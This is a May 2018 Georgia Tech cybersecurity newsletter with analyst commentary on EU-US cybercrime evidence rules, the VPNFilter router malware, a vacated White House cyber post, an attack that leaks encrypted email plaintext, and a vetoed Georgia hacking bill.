Cybersecurity News & Commentary - May 2018

The Source Port is Georgia Tech's monthly cybersecurity newsletter, featuring commentary from its researchers about topics in the news over the past month, what wasn't written between the lines, the big (and sometimes nagging) questions driving our research, and new projects underway.

May 31, 2018


Why an EU-U.S. Agreement Still Is Needed for Cybercrime Investigations

Already, 2018 has been a blockbuster for new privacy and data access laws. Following the implementation of Global Data Protection Regulation (GDPR) in the European Union and the CLOUD Act in the United States, an agreement still is lacking between international governments that would facilitate collection and transfer of cybercrime evidence overseas. Peter Swire and co-author Jennifer Daskal explore whether the CLOUD Act allows the United States to forge executive agreements with the EU as a whole or whether negotiations must proceed country-by-country. After describing legal requirements under U.S. and EU law, the authors propose a framework to resolve important issues for obtaining cybercrime evidence from another country...

Read the full piece by Peter Swire, associate director of policy for the Institute for Information Security & Privacy.


New Malware 'VPNFilter' Takes Advantage of Three Convenient Truths

Cisco Systems' Talos cybersecurity team unearthed a new piece of malware that targets network devices. Dubbed VPNFilter, after the name of a directory the bug creates on affected systems, the malware will take advantage of known vulnerabilities and default credentials on (primarily) routers and network storage devices to install itself and download its monetization components. Attackers managed to deploy the malware on more than 500,000 - 1 million small office/home office (SOHO) and home devices worldwide. Although the intent of the attack has not been fully determined, the malware appears to have several malicious components the attackers can exploit. One of the most significant concerns is a piece of code in the malware used to monitor network traffic and SCADA devices.


IISP Analyst Panagiotis Kintis: "An incredibly large number of Internet connected devices are in homes, maintaining almost 100% uptime. After the Mirai botnet, which managed to render Distributed Denial of Service (DDoS) attacks on massive scale, we see more and more attackers trying to take advantage of our fridges, our microwaves, our TVs, our cars... I can easily see three reasons why I would have shifted to those if I were the attacker: (1) the number of Internet connected devices keeps rising, with cheap devices purchased all the time to make our lives easier; (2) the user sets the device up once and then forgets about it -- few will ever go back and "log on" to a fridge to update its firmware; (3) users have proven their dislike of strong passwords and credentials.

That is what the attackers behind VPNFilter were betting on and the report from Talos shows that they were right. One would think that in 2018, after so many years of security best practices, advertisements, manuals, and instructions, users would have understood the importance of changing the default password on their router, or installing updates on their NAS devices. Apparently, hundreds of thousands of users did not really pay attention, leaving their equipment vulnerable to trivial attacks. Sofacy Group, the (alleged) hacking group behind VPNFilter, built a very sophisticated and modular piece of malware, which they were able to deploy almost effortlessly. The malware allows attackers to change its functionality at will, downloading different modules that can be used to monetize devices in seemingly any way possible.

Once again, I will not blame the users. The users will do whatever is simple and efficient for them. Checking if a default password even exists and changing it, can be challenging even for tech savvy people. The real question is why is there a default password on a device in 2018? We have so many ways to authenticate users and devices today, that I find it really hard to believe that the one-time cost of implementing a secure authentication is unbearable for Fortune 500 companies. Moreover, with so many smart devices appearing in households every time, we (the security community) have a great responsibility of assisting users towards a more secure network. We need ways to identify these devices, evaluate their security level, and understand the risks those devices pose.

Thankfully, the security community and the authorities collaborated adequately and promptly to devise a strategy before VPNFilter could cause more damage. The FBI took over a domain name used by the malware as the command and control (CnC) channel, rendering its persistence impossible. Users now are advised to reboot their devices and the malware will not be able to update itself. At the same time, the authorities will be able to pinpoint the devices that had been compromised and assist with the remediation process."


A Top Cyber Post Goes Vacant

The National Security Council made the decision not to replace the departing Rob Joyce, the first White House Cybersecurity Coordinator for the Trump administration, who left the position to return to the intelligence community. Since assuming office in April, National Security Advisor John Bolton has taken the opportunity to make staffing changes to the National Security Council; the Cybersecurity Coordinator position will ostensibly be consolidated with other roles into a new position. Opposition to this move prompted 19 Democratic Senators to write a letter to Bolton requesting that he reconsider his decision, as the position is critical to the well-being of a holistic national network defense.


IISP Analyst Holly Dragoo: "When the first White House Cybersecurity Coordinator hit the scene in 2009 under the Obama administration, I was initially very skeptical – “Do we really need another bureaucrat? How could this ‘outsider’ suitably brief/know/act on anything cyber well enough to truly inform the President?” Since that time, I’ve converted. Now, with no single agency in charge of herding the cyber-cat stakeholders, and so much money and power dynamically swirling around all things “cyber” these days, to eliminate the position is very short sighted and suggests a dated way of thinking. It is 2018. Coordinating cybersecurity at the national level is a full-time job, and eliminating it signals to adversaries that we’re not fully committed to the topic."


The Lessons Behind an Attack that Decodes Encrypted Email

A team of researchers in Germany and Belgium have just released a paper that describes ways for an attacker to recover the plaintext of encrypted emails. Not only does the class of attacks presented in the paper work against popular PGP and S/MIME encryption schemes, but it also works against multiple email clients, including Outlook, Apple Mail, and Gmail. To decrypt an intercepted email, an attacker need only craft a new email to the recipient that embeds the encrypted email in a clever way that tricks vulnerable email clients to send the plaintext of the original message back to the attacker. The research paper will be presented at the 27th USENIX Security Symposium in Baltimore in August.


IISP Analyst Joel Odom"Let's admit it. Few people use encrypted email. Email security is better than it used to be because we've started using encryption for many of the hops and stops that email makes as it traverses the internet from Alice to Bob, but end-to-end encryption for email is rare. The reason I chose this story to write about is not because it's a flaw that will drastically impact society, but it's a fascinating study in how security fails in unexpected ways. This class of attacks exploits a systemic design flaw rather than a nuanced technical flaw.

How do these attacks work? Suppose that Alice sends an encrypted email message to Bob, which is intercepted by our attacker, Eve. Perhaps Eve intercepts the encrypted message by network sniffing, or perhaps Eve is a sneaky system administrator who can access the encrypted message saved on a server. The point is that the message is encrypted by Alice precisely because there are many ways to capture it as it makes its way to Bob.

In the first variant of the attack, Eve crafts a new email message to Bob in HTML format. This HTML message includes a link to a non-existent image whose pseudo location is partly specified by the encrypted message that Eve is trying to decrypt. When Bob's email client processes the specially-crafted message from Eve, the client encounters the nested encrypted message from Alice and happily decrypts the message using Bob's keys. Having been tricked into thinking that the decrypted message specifies the location of an image to fetch, the client reaches out to Eve for the image and presents Eve the decrypted message in the process.

But, wait! There's more. The paper also describes a second, similar attack whereby Eve can modify the plaintext of the encrypted message from Alice to Bob by making certain clever changes to the ciphertext. This is an application of a known problem with unauthenticated encryption schemes. Eve's modification inserts HTML elements into the message that tricks the email client into send Eve the plaintext of the entire message using a mechanism similar to the first variant described above. (My understanding is that there are optional authenticated modes of encryption available for PGP and S/MIME that I expect would mitigate this attack.)

So what are the lessons here? First, complexity is the enemy of security. HTML is a complex markup language that presents a lot of attack surface for exploitation. Second, attackers can cheat. Eve never actually broke the encryption on the message, she just tricked Bob's e-mail client into decrypting it for her. Third, encryption requires authentication. There are entire classes of attacks that can be prevented by requiring encryption schemes to check the integrity of a message before decrypting it."


Georgia Vetoes Hacking Bill... For Now

Georgia Governor Nathan Deal vetoed State Senate Bill 315, the so-called “computer snooping” bill, that would have made it illegal to access digital networks without permission. Aimed originally at deterring hacker activity with fines and misdemeanor charges, the law potentially would have negatively affected businesses whose sole focus is to look for security flaws to improve network defense. In a statement, Governor Deal said he hoped the authors of the bill could produce a new draft that strikes a balance between national security, data privacy, and technology business development.


IISP Analyst Holly Dragoo"The bill itself, and how far it managed to go in the legislative process is an indicator of how little lawmakers understand about cyber network intrusions. Hackers, by definition, are present on networks without authorized access. As a remotely accessed crime (executed from literally most anywhere in the world) it’s hard to imagine a hacker being deterred by a $5,000 fine, or a state misdemeanor in the state of Georgia, let alone even being aware of the local law. While the veto is quite a victory for the tech industry, it’s not clear whether they are out of the woods yet. Next year’s legislative session will see a new Governor presiding over the veto pen."